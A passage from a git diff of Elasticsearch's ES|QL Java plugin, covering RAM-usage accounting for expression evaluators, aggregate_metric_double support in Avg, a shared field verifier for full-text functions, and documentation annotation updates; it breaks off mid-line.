*/ private static class DateMillisToNanosInEsRelation extends Rule { + + private final boolean isSnapshot; + + DateMillisToNanosInEsRelation(boolean isSnapshot) { + this.isSnapshot = isSnapshot; + } + @Override public LogicalPlan apply(LogicalPlan plan) { - return plan.transformUp(EsRelation.class, relation -> { - if (relation.indexMode() == IndexMode.LOOKUP) { - return relation; - } - return relation.transformExpressionsUp(FieldAttribute.class, f -> { - if (f.field() instanceof InvalidMappedField imf && imf.types().stream().allMatch(DataType::isDate)) { - HashMap typeResolutions = new HashMap<>(); - var convert = new ToDateNanos(f.source(), f); - imf.types().forEach(type -> typeResolutions(f, convert, type, imf, typeResolutions)); - var resolvedField = ResolveUnionTypes.resolvedMultiTypeEsField(f, typeResolutions); - return new FieldAttribute(f.source(), f.parentName(), f.name(), resolvedField, f.nullable(), f.id(), f.synthetic()); + if (isSnapshot) { + return plan.transformUp(EsRelation.class, relation -> { + if (relation.indexMode() == IndexMode.LOOKUP) { + return relation; } - return f; + return relation.transformExpressionsUp(FieldAttribute.class, f -> { + if (f.field() instanceof InvalidMappedField imf && imf.types().stream().allMatch(DataType::isDate)) { + HashMap typeResolutions = new HashMap<>(); + var convert = new ToDateNanos(f.source(), f); + imf.types().forEach(type -> typeResolutions(f, convert, type, imf, typeResolutions)); + var resolvedField = ResolveUnionTypes.resolvedMultiTypeEsField(f, typeResolutions); + return new FieldAttribute( + f.source(), + f.parentName(), + f.name(), + resolvedField, + f.nullable(), + f.id(), + f.synthetic() + ); + } + return f; + }); }); - }); + } else { + return plan; + } } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/capabilities/TranslationAware.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/capabilities/TranslationAware.java index 1a2fd81db4b6c..730cccb4dce45 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/capabilities/TranslationAware.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/capabilities/TranslationAware.java @@ -7,8 +7,11 @@ package org.elasticsearch.xpack.esql.capabilities; +import org.apache.lucene.search.MultiTermQuery.RewriteMethod; import org.elasticsearch.compute.lucene.LuceneTopNSourceOperator; import org.elasticsearch.compute.operator.FilterOperator; +import org.elasticsearch.index.mapper.MappedFieldType; +import org.elasticsearch.index.query.SearchExecutionContext; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.querydsl.query.Query; import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; @@ -47,6 +50,23 @@ static TranslationAware.Translatable translatable(Expression exp, LucenePushdown */ Query asQuery(LucenePushdownPredicates pushdownPredicates, TranslatorHandler handler); + /** + * Translates this expression into a Lucene {@link org.apache.lucene.search.Query}. + *
<p> + * Implementations should use the provided field type, rewrite method, and search execution context + * to construct an appropriate Lucene query for this expression. + * By default, this method throws {@link UnsupportedOperationException}; override it in subclasses + * that support Lucene query translation. + * </p>
+ */ + default org.apache.lucene.search.Query asLuceneQuery( + MappedFieldType fieldType, + RewriteMethod constantScoreRewrite, + SearchExecutionContext context + ) { + throw new UnsupportedOperationException("asLuceneQuery is not implemented for " + getClass().getName()); + } + /** * Subinterface for expressions that can only process single values (and null out on MVs). */ diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/enrich/AbstractLookupService.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/enrich/AbstractLookupService.java index 1c21f92053603..6bd3ca2584dc9 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/enrich/AbstractLookupService.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/enrich/AbstractLookupService.java @@ -35,7 +35,7 @@ import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.OrdinalBytesRefBlock; import org.elasticsearch.compute.data.Page; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; @@ -347,8 +347,14 @@ private void doLookup(T request, CancellableTask task, ActionListener warnings ); releasables.add(queryOperator); - var extractFieldsOperator = extractFieldsOperator(shardContext.context, driverContext, request.extractFields); - releasables.add(extractFieldsOperator); + + List operators = new ArrayList<>(); + if (request.extractFields.isEmpty() == false) { + var extractFieldsOperator = extractFieldsOperator(shardContext.context, driverContext, request.extractFields); + releasables.add(extractFieldsOperator); + operators.add(extractFieldsOperator); + } + operators.add(finishPages); /* * Collect all result Pages in a synchronizedList mostly out of paranoia. 
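For the asLuceneQuery default added to TranslationAware above, an overriding expression might be sketched as follows. The PrefixPushdown class is hypothetical and shows only the translation hook; a real TranslationAware implementation would also provide asQuery and friends.

import org.apache.lucene.index.Term;
import org.apache.lucene.search.MultiTermQuery.RewriteMethod;
import org.apache.lucene.search.PrefixQuery;
import org.apache.lucene.search.Query;
import org.elasticsearch.index.mapper.MappedFieldType;
import org.elasticsearch.index.query.SearchExecutionContext;

// Hypothetical expression that pushes a prefix pattern down to Lucene.
final class PrefixPushdown {
    private final String prefix;

    PrefixPushdown(String prefix) {
        this.prefix = prefix;
    }

    public Query asLuceneQuery(MappedFieldType fieldType, RewriteMethod constantScoreRewrite, SearchExecutionContext context) {
        // This sketch ignores the context; real overrides may consult it, e.g. for runtime fields.
        // The resolved field name comes from the mapping, the rewrite method from the caller.
        return new PrefixQuery(new Term(fieldType.name(), prefix), constantScoreRewrite);
    }
}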
We'll @@ -370,7 +376,7 @@ private void doLookup(T request, CancellableTask task, ActionListener driverContext, request::toString, queryOperator, - List.of(extractFieldsOperator, finishPages), + operators, outputOperator, Driver.DEFAULT_STATUS_INTERVAL, Releasables.wrap(shardContext.release, localBreaker) @@ -441,6 +447,7 @@ private static Operator extractFieldsOperator( } return new ValuesSourceReaderOperator( driverContext.blockFactory(), + Long.MAX_VALUE, fields, List.of( new ValuesSourceReaderOperator.ShardContext( diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/EvalMapper.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/EvalMapper.java index d054a8cecb072..81f58cd2f24a0 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/EvalMapper.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/EvalMapper.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.esql.evaluator; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.ann.Evaluator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BlockFactory; @@ -103,6 +104,11 @@ public ExpressionEvaluator.Factory map(FoldContext foldCtx, BinaryLogic bc, Layo record BooleanLogicExpressionEvaluator(BinaryLogic bl, ExpressionEvaluator leftEval, ExpressionEvaluator rightEval) implements ExpressionEvaluator { + + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance( + BooleanLogicExpressionEvaluator.class + ); + @Override public Block eval(Page page) { try (Block lhs = leftEval.eval(page); Block rhs = rightEval.eval(page)) { @@ -115,6 +121,11 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED; + } + /** * Eval blocks, handling {@code null}. 
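The doLookup change above assembles the intermediate operator list conditionally, so the field-extraction stage disappears entirely when no extract fields were requested instead of running as a no-op. In reduced form, with a generic stand-in for the real Operator type:

import java.util.ArrayList;
import java.util.List;

final class LookupPipeline {
    private LookupPipeline() {}

    // The extraction stage is added only when the request actually asks for fields;
    // the page-finishing stage is always present and always last.
    static <O> List<O> intermediateOperators(boolean hasExtractFields, O extractFieldsOperator, O finishPages) {
        List<O> operators = new ArrayList<>(2);
        if (hasExtractFields) {
            operators.add(extractFieldsOperator);
        }
        operators.add(finishPages);
        return operators;
    }
}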
This takes {@link Block} instead of * {@link BooleanBlock} because blocks that only contain @@ -171,6 +182,8 @@ static class Attributes extends ExpressionMapper { @Override public ExpressionEvaluator.Factory map(FoldContext foldCtx, Attribute attr, Layout layout, List shardContexts) { record Attribute(int channel) implements ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Attribute.class); + @Override public Block eval(Page page) { Block block = page.getBlock(channel); @@ -178,6 +191,11 @@ public Block eval(Page page) { return block; } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED; + } + @Override public void close() {} } @@ -206,6 +224,8 @@ static class Literals extends ExpressionMapper { @Override public ExpressionEvaluator.Factory map(FoldContext foldCtx, Literal lit, Layout layout, List shardContexts) { record LiteralsEvaluator(DriverContext context, Literal lit) implements ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LiteralsEvaluator.class); + @Override public Block eval(Page page) { return block(lit, context.blockFactory(), page.getPositionCount()); @@ -216,6 +236,11 @@ public String toString() { return "LiteralsEvaluator[lit=" + lit + ']'; } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + lit.ramBytesUsed(); + } + @Override public void close() {} } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/mapper/EvaluatorMapper.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/mapper/EvaluatorMapper.java index a4a17297abc09..f11d4fbc86967 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/mapper/EvaluatorMapper.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/mapper/EvaluatorMapper.java @@ -102,6 +102,11 @@ public Block eval(Page page) { return fromArrayRow(driverContext.blockFactory(), expression.fold(ctx))[0]; } + @Override + public long baseRamBytesUsed() { + throw new UnsupportedOperationException("not used"); + } + @Override public void close() {} }; diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistry.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistry.java index bf6affb49a0b2..3d05eb5291435 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistry.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistry.java @@ -1129,10 +1129,10 @@ public static FunctionDefinition def( String... names ) { FunctionBuilder builder = (source, children, cfg) -> { - if (children.size() > 1) { + if (children.size() != 1) { throw new QlIllegalArgumentException("expects exactly one argument"); } - Expression ex = children.size() == 1 ? 
children.get(0) : null; + Expression ex = children.get(0); return ctorRef.build(source, ex, cfg); }; return def(function, builder, names); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Avg.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Avg.java index 9f32a4a740a72..931321bab4b1b 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Avg.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Avg.java @@ -28,6 +28,7 @@ import static java.util.Collections.emptyList; import static org.elasticsearch.xpack.esql.core.expression.TypeResolutions.ParamOrdinal.DEFAULT; import static org.elasticsearch.xpack.esql.core.expression.TypeResolutions.isType; +import static org.elasticsearch.xpack.esql.core.type.DataType.AGGREGATE_METRIC_DOUBLE; public class Avg extends AggregateFunction implements SurrogateExpression { public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry(Expression.class, "Avg", Avg::new); @@ -50,7 +51,7 @@ public Avg( Source source, @Param( name = "number", - type = { "double", "integer", "long" }, + type = { "aggregate_metric_double", "double", "integer", "long" }, description = "Expression that outputs values to average." ) Expression field ) { @@ -65,10 +66,10 @@ public Avg(Source source, Expression field, Expression filter) { protected Expression.TypeResolution resolveType() { return isType( field(), - dt -> dt.isNumeric() && dt != DataType.UNSIGNED_LONG, + dt -> dt.isNumeric() && dt != DataType.UNSIGNED_LONG || dt == AGGREGATE_METRIC_DOUBLE, sourceText(), DEFAULT, - "numeric except unsigned_long or counter types" + "aggregate_metric_double or numeric except unsigned_long or counter types" ); } @@ -105,9 +106,12 @@ public Avg withFilter(Expression filter) { public Expression surrogate() { var s = source(); var field = field(); - - return field().foldable() - ? 
new MvAvg(s, field) - : new Div(s, new Sum(s, field, filter()), new Count(s, field, filter()), dataType()); + if (field.foldable()) { + return new MvAvg(s, field); + } + if (field.dataType() == AGGREGATE_METRIC_DOUBLE) { + return new Div(s, new Sum(s, field, filter()).surrogate(), new Count(s, field, filter()).surrogate()); + } + return new Div(s, new Sum(s, field, filter()), new Count(s, field, filter()), dataType()); } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Count.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Count.java index aef221ab6a7e9..4fbe6f22a784f 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Count.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Count.java @@ -55,7 +55,7 @@ public class Count extends AggregateFunction implements ToAggregator, SurrogateE ), @Example( description = "To count the number of times an expression returns `TRUE` use " - + "a <> command to remove rows that shouldn’t be included", + + "a [`WHERE`](/reference/query-languages/esql/commands/where.md) command to remove rows that shouldn’t be included", file = "stats", tag = "count-where" ), diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Sample.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Sample.java index 781f9ad67c05c..030b4c08f8c15 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Sample.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Sample.java @@ -24,6 +24,8 @@ import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.expression.function.Example; +import org.elasticsearch.xpack.esql.expression.function.FunctionAppliesTo; +import org.elasticsearch.xpack.esql.expression.function.FunctionAppliesToLifecycle; import org.elasticsearch.xpack.esql.expression.function.FunctionInfo; import org.elasticsearch.xpack.esql.expression.function.FunctionType; import org.elasticsearch.xpack.esql.expression.function.Param; @@ -59,7 +61,9 @@ public class Sample extends AggregateFunction implements ToAggregator { "version" }, description = "Collects sample values for a field.", type = FunctionType.AGGREGATE, - examples = @Example(file = "stats_sample", tag = "doc") + examples = @Example(file = "stats_sample", tag = "doc"), + appliesTo = { @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.GA, version = "9.1.0") } + ) public Sample( Source source, diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/FullTextFunction.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/FullTextFunction.java index 5510fbddd27c7..ec29b4b658c76 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/FullTextFunction.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/FullTextFunction.java @@ -14,6 +14,7 @@ import org.elasticsearch.compute.lucene.LuceneQueryScoreEvaluator; import org.elasticsearch.compute.operator.EvalOperator; import org.elasticsearch.compute.operator.ScoreOperator; +import 
org.elasticsearch.index.IndexMode; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.xpack.esql.capabilities.PostAnalysisPlanVerificationAware; import org.elasticsearch.xpack.esql.capabilities.TranslationAware; @@ -314,6 +315,45 @@ private static FullTextFunction forEachFullTextFunctionParent(Expression conditi return null; } + public static void fieldVerifier(LogicalPlan plan, FullTextFunction function, Expression field, Failures failures) { + var fieldAttribute = fieldAsFieldAttribute(field); + if (fieldAttribute == null) { + plan.forEachExpression(function.getClass(), m -> { + if (function.children().contains(field)) { + failures.add( + fail( + field, + "[{}] {} cannot operate on [{}], which is not a field from an index mapping", + m.functionName(), + m.functionType(), + field.sourceText() + ) + ); + } + }); + } else { + // Traverse the plan to find the EsRelation outputting the field + plan.forEachDown(p -> { + if (p instanceof EsRelation esRelation && esRelation.indexMode() != IndexMode.STANDARD) { + // Check if this EsRelation supplies the field + if (esRelation.outputSet().contains(fieldAttribute)) { + failures.add( + fail( + field, + "[{}] {} cannot operate on [{}], supplied by an index [{}] in non-STANDARD mode [{}]", + function.functionName(), + function.functionType(), + field.sourceText(), + esRelation.indexPattern(), + esRelation.indexMode() + ) + ); + } + } + }); + } + } + @Override public EvalOperator.ExpressionEvaluator.Factory toEvaluator(ToEvaluator toEvaluator) { List shardContexts = toEvaluator.shardContexts(); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Match.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Match.java index 53aa87f4b861a..e6d99d158aaaf 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Match.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Match.java @@ -15,7 +15,6 @@ import org.elasticsearch.common.unit.Fuzziness; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.xpack.esql.capabilities.PostAnalysisPlanVerificationAware; -import org.elasticsearch.xpack.esql.common.Failure; import org.elasticsearch.xpack.esql.common.Failures; import org.elasticsearch.xpack.esql.core.InvalidArgumentException; import org.elasticsearch.xpack.esql.core.expression.Expression; @@ -393,19 +392,7 @@ public Expression replaceQueryBuilder(QueryBuilder queryBuilder) { public BiConsumer postAnalysisPlanVerification() { return (plan, failures) -> { super.postAnalysisPlanVerification().accept(plan, failures); - plan.forEachExpression(Match.class, m -> { - if (m.fieldAsFieldAttribute() == null) { - failures.add( - Failure.fail( - m.field(), - "[{}] {} cannot operate on [{}], which is not a field from an index mapping", - functionName(), - functionType(), - m.field().sourceText() - ) - ); - } - }); + fieldVerifier(plan, this, field, failures); }; } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/MatchPhrase.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/MatchPhrase.java index 134096460a3d7..f3798a6ebf463 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/MatchPhrase.java +++ 
b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/MatchPhrase.java @@ -13,7 +13,6 @@ import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.xpack.esql.capabilities.PostAnalysisPlanVerificationAware; -import org.elasticsearch.xpack.esql.common.Failure; import org.elasticsearch.xpack.esql.common.Failures; import org.elasticsearch.xpack.esql.core.InvalidArgumentException; import org.elasticsearch.xpack.esql.core.expression.Expression; @@ -60,10 +59,8 @@ import static org.elasticsearch.xpack.esql.core.type.DataType.DATE_NANOS; import static org.elasticsearch.xpack.esql.core.type.DataType.FLOAT; import static org.elasticsearch.xpack.esql.core.type.DataType.INTEGER; -import static org.elasticsearch.xpack.esql.core.type.DataType.IP; import static org.elasticsearch.xpack.esql.core.type.DataType.KEYWORD; import static org.elasticsearch.xpack.esql.core.type.DataType.TEXT; -import static org.elasticsearch.xpack.esql.core.type.DataType.VERSION; /** * Full text function that performs a {@link org.elasticsearch.xpack.esql.querydsl.query.MatchPhraseQuery} . @@ -92,9 +89,7 @@ public class MatchPhrase extends FullTextFunction implements OptionalArgument, P @FunctionInfo( returnType = "boolean", - appliesTo = { - @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.UNAVAILABLE, version = "9.0"), - @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.GA, version = "9.1.0") }, + appliesTo = { @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.GA, version = "9.1.0") }, description = """ Use `MATCH_PHRASE` to perform a [`match_phrase`](/reference/query-languages/query-dsl/query-dsl-match-query-phrase.md) on the specified field. @@ -252,19 +247,7 @@ public Expression replaceQueryBuilder(QueryBuilder queryBuilder) { public BiConsumer postAnalysisPlanVerification() { return (plan, failures) -> { super.postAnalysisPlanVerification().accept(plan, failures); - plan.forEachExpression(MatchPhrase.class, mp -> { - if (mp.fieldAsFieldAttribute() == null) { - failures.add( - Failure.fail( - mp.field(), - "[{}] {} cannot operate on [{}], which is not a field from an index mapping", - functionName(), - functionType(), - mp.field().sourceText() - ) - ); - } - }); + FullTextFunction.fieldVerifier(plan, this, field, failures); }; } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Term.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Term.java index 94de3d33251d8..76188dc146ee6 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Term.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Term.java @@ -13,7 +13,6 @@ import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.xpack.esql.capabilities.PostAnalysisPlanVerificationAware; -import org.elasticsearch.xpack.esql.common.Failure; import org.elasticsearch.xpack.esql.common.Failures; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; @@ -112,19 +111,7 @@ private TypeResolution resolveField() { public BiConsumer postAnalysisPlanVerification() { return (plan, failures) -> { super.postAnalysisPlanVerification().accept(plan, failures); - plan.forEachExpression(Term.class, t -> { - if (t.field() 
instanceof FieldAttribute == false) { // TODO: is a conversion possible, similar to Match’s case? - failures.add( - Failure.fail( - t.field(), - "[{}] {} cannot operate on [{}], which is not a field from an index mapping", - t.functionName(), - t.functionType(), - t.field().sourceText() - ) - ); - } - }); + fieldVerifier(plan, this, field, failures); }; } @@ -157,6 +144,7 @@ public Expression field() { return field; } + // TODO: method can be dropped, to allow failure messages to contain the capitalized function name, aligned with similar functions/classes @Override public String functionName() { return ENTRY.name; diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Bucket.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Bucket.java index bb6633686fc7c..9b3cf7d2f683f 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Bucket.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Bucket.java @@ -135,7 +135,7 @@ another in which the bucket size is provided directly (two parameters). ::::{note} `BUCKET` does not filter any rows. It only uses the provided range to pick a good bucket size. For rows with a value outside of the range, it returns a bucket value that corresponds to a bucket outside the range. - Combine `BUCKET` with <> to filter rows. + Combine `BUCKET` with [`WHERE`](/reference/query-languages/esql/commands/where.md) to filter rows. ::::""" ), @Example(description = """ @@ -169,7 +169,7 @@ another in which the bucket size is provided directly (two parameters). @Example( description = """ `BUCKET` may be used in both the aggregating and grouping part of the - <> command provided that in the aggregating + [STATS ... BY ...](/reference/query-languages/esql/commands/stats-by.md) command provided that in the aggregating part the function is referenced by an alias defined in the grouping part, or that it is invoked with the exact same expression:""", file = "bucket", diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Categorize.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Categorize.java index 81ac52cad151d..570410c7a11c2 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Categorize.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/grouping/Categorize.java @@ -18,6 +18,8 @@ import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.expression.function.Example; +import org.elasticsearch.xpack.esql.expression.function.FunctionAppliesTo; +import org.elasticsearch.xpack.esql.expression.function.FunctionAppliesToLifecycle; import org.elasticsearch.xpack.esql.expression.function.FunctionInfo; import org.elasticsearch.xpack.esql.expression.function.FunctionType; import org.elasticsearch.xpack.esql.expression.function.Param; @@ -63,7 +65,10 @@ public class Categorize extends GroupingFunction.NonEvaluatableGroupingFunction tag = "docsCategorize", description = "This example categorizes server log messages into categories and aggregates their counts. 
" ) }, - type = FunctionType.GROUPING + type = FunctionType.GROUPING, + appliesTo = { + @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.PREVIEW, version = "9.0"), + @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.GA, version = "9.1") } ) public Categorize( Source source, diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/Case.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/Case.java index fff1189207cc7..64c176abd9c2c 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/Case.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/Case.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.conditional; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -364,6 +365,9 @@ record ConditionEvaluator( EvalOperator.ExpressionEvaluator condition, EvalOperator.ExpressionEvaluator value ) implements Releasable { + + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CaseLazyEvaluator.class); + @Override public void close() { Releasables.closeExpectNoException(condition, value); @@ -377,6 +381,10 @@ public String toString() { public void registerMultivalue() { conditionWarnings.registerException(new IllegalArgumentException("CASE expects a single-valued boolean")); } + + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + condition.baseRamBytesUsed() + value.baseRamBytesUsed(); + } } private record CaseLazyEvaluatorFactory( @@ -414,6 +422,9 @@ private record CaseLazyEvaluator( List conditions, EvalOperator.ExpressionEvaluator elseVal ) implements EvalOperator.ExpressionEvaluator { + + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CaseLazyEvaluator.class); + @Override public Block eval(Page page) { /* @@ -461,6 +472,16 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (ConditionEvaluator condition : conditions) { + baseRamBytesUsed += condition.baseRamBytesUsed(); + } + baseRamBytesUsed += elseVal.baseRamBytesUsed(); + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(() -> Releasables.close(conditions), elseVal); @@ -504,6 +525,9 @@ private record CaseEagerEvaluator( ConditionEvaluator condition, EvalOperator.ExpressionEvaluator elseVal ) implements EvalOperator.ExpressionEvaluator { + + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CaseLazyEvaluator.class); + @Override public Block eval(Page page) { try (BooleanBlock lhsOrRhsBlock = (BooleanBlock) condition.condition.eval(page); ToMask lhsOrRhs = lhsOrRhsBlock.toMask()) { @@ -542,6 +566,11 @@ public void close() { Releasables.closeExpectNoException(condition, elseVal); } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + condition.baseRamBytesUsed() + elseVal.baseRamBytesUsed(); + } + @Override public String toString() { return "CaseEagerEvaluator[conditions=[" + condition + "], elseVal=" + elseVal + ']'; diff --git 
a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromAggregateMetricDouble.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromAggregateMetricDouble.java index 61129df973a55..977c52de3c819 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromAggregateMetricDouble.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromAggregateMetricDouble.java @@ -7,12 +7,14 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.convert; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.compute.data.AggregateMetricDoubleBlock; import org.elasticsearch.compute.data.AggregateMetricDoubleBlockBuilder; import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.Page; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.EvalOperator; @@ -136,37 +138,46 @@ public String toString() { @Override public EvalOperator.ExpressionEvaluator get(DriverContext context) { final EvalOperator.ExpressionEvaluator eval = fieldEvaluator.get(context); + final int subFieldIndex = ((Number) subfieldIndex.fold(FoldContext.small())).intValue(); + return new Evaluator(context.blockFactory(), eval, subFieldIndex); + } + }; + } + + private record Evaluator(BlockFactory blockFactory, EvalOperator.ExpressionEvaluator eval, int subFieldIndex) + implements + EvalOperator.ExpressionEvaluator { - return new 